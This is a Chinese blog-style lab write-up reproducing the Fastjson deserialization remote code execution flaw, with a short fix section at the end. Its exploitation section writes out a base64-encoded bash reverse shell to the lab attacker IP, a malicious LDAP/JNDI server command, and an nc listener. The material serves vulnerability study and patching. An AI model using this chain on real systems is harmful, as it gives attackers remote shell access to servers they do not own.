漏洞复现 - - - Fastjson反序列化漏洞

一,Fastjson简介

1.Fastjson是什么

Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。Fastjson 源码地址:https://github.com/alibaba/fastjson 

2.Fastjson有什么用

将 Java 对象转换为 JSON 格式,当然也可将JSON格式转换为Java格式

3.什么是是反序列化

我们搞懂了什么是fastjson那我们理解一下序列化,反序列化又是什么意思呢 。

序列化:将对象转化成字节的过程

作用:因为对象统一存储在JVM中,所以就导致了如果JVM关闭,对象也就会消失。而序列化就可以将对象转换为字节的序列,可以写进硬盘文件中实现长期的保存。

反序列化:将字节转化成对象的过程

作用:将序列组成的字节,转换为对象。

对象序列化就是将对象的数据复制一个一模一样的对象(个人理解)

4. Fastjson漏洞产生原因

反序列化之后的数据本来是没有危害的,但是用户使用可控数据是有危害的

漏洞信息:

fastjson 1.2.24 反序列化导致任意命令执行漏洞:fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。影响版本fastjson <= 1.2.24。 Fastjson 1.2.47 远程命令执行漏洞:fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。影响版本fastjson <1.2.48。

取自合天网安实验室

二,漏洞利用(反弹shell)

靶机:Centos7+docker+fastjson1.2.25

 IP地址:10.1.1.119:8080

攻击机:Kali  

IP地址:10.1.1.148

利用工具请下载使用:fastjsonRCE

我们在外网看到了使用了fastjson我们直接对其进行利用,我们这里通过ldap+jndi注入的方式实现RCE,基于ldap的利用方式:适用jdk版本:JDK 11.0.1、8u191、7u201、6u211之前。

 1.python将反弹shell的命令进行base64编码

python 

import base64

base64.b64encode('/bin/bash -i >& /dev/tcp/10.1.1.148/2333 0>&1')     

//映射端口设置为2333

漏洞复现 - - - Fastjson反序列化漏洞_第1张图片

2.执行命令启动ldap服务器

java -cp fastjson_tool.jar fastjson.HLDAPServer 10.1.1.148 1234 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEuMS4xNDgvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}"

//java -cp fastjson_tool.jar fastjson.HLDAPServer ip port"要执行的命令"

//在本地2333端口上启动一个ldap服务器,10.1.1.148为本机IP,并指定加载远程类,因为是反弹shell的命令,需要将其进行编码,管道符、输入输出重定向,只有在bash环境下才能用。所以我们需要java为我们提供的命令执行环境,不支持管道符、输入输出重定向,因此需要base64编码。

漏洞复现 - - - Fastjson反序列化漏洞_第2张图片

3.监听端口

nc -lvvp 2333 

漏洞复现 - - - Fastjson反序列化漏洞_第3张图片 4.使用bp

将抓到的请求修改为POST请求。

Content-Type 修改为 application/json 

然后将playload复制到bp发送

查看监听的端口,就复现成功

漏洞复现 - - - Fastjson反序列化漏洞_第4张图片

 

 三, 漏洞修复

1. fastjson 版本至少升级到 1.2.58。

2.及时升级Java环境版本

你可能感兴趣的:(#,经典漏洞复现,网安,java,json,开发语言,网络)